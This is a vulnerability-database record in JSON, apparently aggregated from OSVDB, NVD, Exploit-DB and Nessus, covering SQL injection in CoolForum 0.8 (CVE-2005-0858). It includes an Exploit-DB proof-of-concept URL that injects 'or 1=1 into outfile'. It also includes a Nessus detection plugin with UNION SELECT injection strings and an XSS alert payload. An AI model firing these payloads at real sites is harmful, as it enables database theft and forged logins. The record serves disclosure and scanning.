{"type": "osvdb", "published": "2005-03-17T19:47:52", "href": "https://vulners.com/osvdb/OSVDB:14953", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "viewCount": 6, "edition": 1, "reporter": "Romano(romano_45@hotmail.com)", "title": "CoolForum register.php login Parameter SQL Injection", "affectedSoftware": [{"operator": "eq", "version": "0.8", "name": "CoolForum"}], "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2017-04-28T13:20:11", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0858"]}, {"type": "osvdb", "idList": ["OSVDB:14952"]}, {"type": "exploitdb", "idList": ["EDB-ID:25240"]}, {"type": "nessus", "idList": ["COOLFORUM_XSS_SQL.NASL"]}], "modified": "2017-04-28T13:20:11", "rev": 2}, "vulnersScore": 7.8}, "references": [], "id": "OSVDB:14953", "lastseen": "2017-04-28T13:20:11", "cvelist": ["CVE-2005-0858"], "modified": "2005-03-17T19:47:52", "description": "## Vulnerability Description\nCoolForum contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'login' parameter in the 'register.php' script not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.\n## Solution Description\nUpgrade to version 0.8.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nCoolForum contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'login' parameter in the 'register.php' script not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.\n## References:\nVendor URL: http://www.coolforum.net/\nSecurity Tracker: 1013474\n[Related OSVDB ID: 14951](https://vulners.com/osvdb/OSVDB:14951)\n[Related OSVDB ID: 14952](https://vulners.com/osvdb/OSVDB:14952)\nISS X-Force ID: 19759\n[CVE-2005-0858](https://vulners.com/cve/CVE-2005-0858)\nBugtraq ID: 12852\n"}

{"cve": [{"lastseen": "2021-02-02T05:24:35", "description": "Multiple SQL injection vulnerabilities in CoolForum 0.8 and earlier allow remote attackers to execute arbitrary SQL commands via (1) the pseudo parameter to entete.php or (2) the login parameter to register.php.", "edition": 6, "cvss3": {}, "published": "2005-05-02T04:00:00", "title": "CVE-2005-0858", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0858"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:coolforum:coolforum:0.8"], "id": "CVE-2005-0858", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0858", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:coolforum:coolforum:0.8:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:11", "bulletinFamily": "software", "cvelist": ["CVE-2005-0858"], "edition": 1, "description": "## Vulnerability Description\nCoolForum contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'pseudo' parameter in the 'entete.php' script not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.\n## Solution Description\nUpgrade to version 0.8.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nCoolForum contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'pseudo' parameter in the 'entete.php' script not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.\n## References:\nVendor URL: http://www.coolforum.net/\nSecurity Tracker: 1013474\n[Related OSVDB ID: 14953](https://vulners.com/osvdb/OSVDB:14953)\n[Related OSVDB ID: 14951](https://vulners.com/osvdb/OSVDB:14951)\nISS X-Force ID: 19759\n[CVE-2005-0858](https://vulners.com/cve/CVE-2005-0858)\nBugtraq ID: 12852\n", "modified": "2005-03-17T19:47:52", "published": "2005-03-17T19:47:52", "href": "https://vulners.com/osvdb/OSVDB:14952", "id": "OSVDB:14952", "type": "osvdb", "title": "CoolForum entete.php pseudo Parameter SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T00:56:41", "description": "CoolForum 0.5/0.7/0.8 register.php login Parameter SQL Injection. CVE-2005-0858. Webapps exploit for php platform", "published": "2005-03-19T00:00:00", "type": "exploitdb", "title": "CoolForum 0.5/0.7/0.8 register.php login Parameter SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0858"], "modified": "2005-03-19T00:00:00", "id": "EDB-ID:25240", "href": "https://www.exploit-db.com/exploits/25240/", "sourceData": "source: http://www.securityfocus.com/bid/12852/info\r\n \r\nMultiple remote input validation vulnerabilities affect CoolForum. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality.\r\n \r\nMultiple SQL injection vulnerabilities have been reported and a cross-site scripting vulnerability is also reported.\r\n \r\nAn attacker may leverage these issues to manipulate and view arbitrary database contents by exploiting the SQL injection issues, and to have arbitrary script code executed in the browser of an unsuspecting user by exploiting the cross-site scripting vulnerabilities. \r\n\r\nhttp://www.example.com/register.php?action=confirm&login='or 1=1 into outfile '/var/www/html/cf_users_with_magic_quotes_on.txt ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25240/"}], "nessus": [{"lastseen": "2021-01-20T09:38:17", "description": "The remote host is running a version of CoolForum that suffers from\nmultiple input validation vulnerabilities. \n\n - Multiple SQL Injection Vulnerabilities\n Due to a failure to properly sanitize user-input supplied \n through the 'pseudo' parameter of the 'admin/entete.php' script\n and the 'ilogin' parameter of the 'register.php' script, an\n attacker may be able to manipulate SQL queries and view\n arbitrary database contents provided PHP's 'magic_quotes_gpc'\n setting is disabled.\n\n - A Cross-Site Scripting Vulnerability\n It is possible to inject arbitrary script and HTML code into the\n 'img' parameter of the 'avatar.php' script. An attacker can\n exploit these flaws to cause code to run on a user's browser\n within the context of the remote site, enabling him to steal\n authentication cookies, access data recently submitted by the\n user, and the like.", "edition": 24, "published": "2005-03-22T00:00:00", "title": "CoolForum Multiple Vulnerabilities (SQLi, XSS)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0858", "CVE-2005-0857"], "modified": "2005-03-22T00:00:00", "cpe": [], "id": "COOLFORUM_XSS_SQL.NASL", "href": "https://www.tenable.com/plugins/nessus/17597", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description) {\n script_id(17597);\n script_version(\"1.22\");\n\n script_cve_id(\"CVE-2005-0857\", \"CVE-2005-0858\");\n script_bugtraq_id(12852);\n\n script_name(english:\"CoolForum Multiple Vulnerabilities (SQLi, XSS)\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that suffers from\nmultiple issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of CoolForum that suffers from\nmultiple input validation vulnerabilities. \n\n - Multiple SQL Injection Vulnerabilities\n Due to a failure to properly sanitize user-input supplied \n through the 'pseudo' parameter of the 'admin/entete.php' script\n and the 'ilogin' parameter of the 'register.php' script, an\n attacker may be able to manipulate SQL queries and view\n arbitrary database contents provided PHP's 'magic_quotes_gpc'\n setting is disabled.\n\n - A Cross-Site Scripting Vulnerability\n It is possible to inject arbitrary script and HTML code into the\n 'img' parameter of the 'avatar.php' script. An attacker can\n exploit these flaws to cause code to run on a user's browser\n within the context of the remote site, enabling him to steal\n authentication cookies, access data recently submitted by the\n user, and the like.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://securitytracker.com/alerts/2005/Mar/1013474.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to CoolForum version 0.8.1 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/03/22\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/03/18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n summary[\"english\"] = \"Checks for cross-site scripting and SQL injection vulnerabilities in CoolForum\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n \n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80, php: 1);\n\n\nforeach dir (cgi_dirs()) {\n # Grab index.php.\n res = http_get_cache(item:string(dir, \"/index.php\"), port:port, exit_on_fail: 1);\n\n # If it's CoolForum...\n if (egrep(string:res, pattern:\"Powered by .*CoolForum\")) {\n # Try the SQL injections.\n #\n # nb: these particular exploits may not be particularly\n # interesting, but they at least demonstrate the \n # install is vulnerable.\n #\n # - requires PHP's magic_quotes to be off.\n postdata = string(\n \"action=login&\",\n \"password=&\",\n # nb: this forces a match for id=12345, user \"nessus\", who has\n # an empty password and has already been confirmed. It\n # does not, though, add the user to any databases.\n \"pseudo='Union%20SELECT%20'12345','nessus','','','1'%20FROM%20CF_config%23\"\n );\n init_cookiejar();\n r = http_send_recv3(method: 'POST', item: dir+\"/admin/entete.php\", \n version: 11, data: postdata, port: port,\n add_headers: make_array(\"Content-Type\", \"application/x-www-form-urlencoded\"));\n # If we get a CoolForumID cookie, there's a problem.\n if (get_http_cookie(name: \"CoolForumID\")) {\n security_warning(port);\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n # - only in CoolForum 0.8 and it requires CoolForum's confirmation \n # by mail option to be enabled (it is by default).\n r = http_send_recv3(method: 'GET', port: port, exit_on_fail: 1,\n item:string(dir, \"/register.php?\",\n \"action=confirm&\",\n # nb: this is an empty string encoded as md5; eg, 'md5(\"\")'.\n \"s=d41d8cd98f00b204e9800998ecf8427e&\",\n # nb: this forces a match for id=12345, user \"nessus\", who has\n # an empty password and has already been confirmed. It\n # does not, though, add the user to any databases.\n \"login='Union%20SELECT%20'12345','nessus','','','1'%20FROM%20CF_config%23\"\n ));\n # If the response indicates we've already confirmed, there's a problem.\n if (egrep(string: r[2], pattern:\"<b>Op.+ration impossible, votre inscription a d.j. .t. confirm.e!</b>\")) {\n security_warning(port);\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n\n # Try an XSS exploit - a simple alert to display \"Nessus was here\".\n #\n # nb: this requires PHP's display_errors to be enabled.\n xss = \"'><script>alert('Nessus was here');</script>\";\n # nb: the url-encoded version is what we need to pass in.\n exss = \"'%3E%3Cscript%3Ealert('Nessus%20was%20here')%3B%3C%2Fscript%3E\";\n r = http_send_recv3(port: port, method: 'GET', item:string(dir, \"/avatar.php?img=\", exss), exit_on_fail: 1);\n # If we see our XSS, there's a problem.\n if (egrep(string: r[2], pattern:xss)) {\n security_warning(port);\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}]}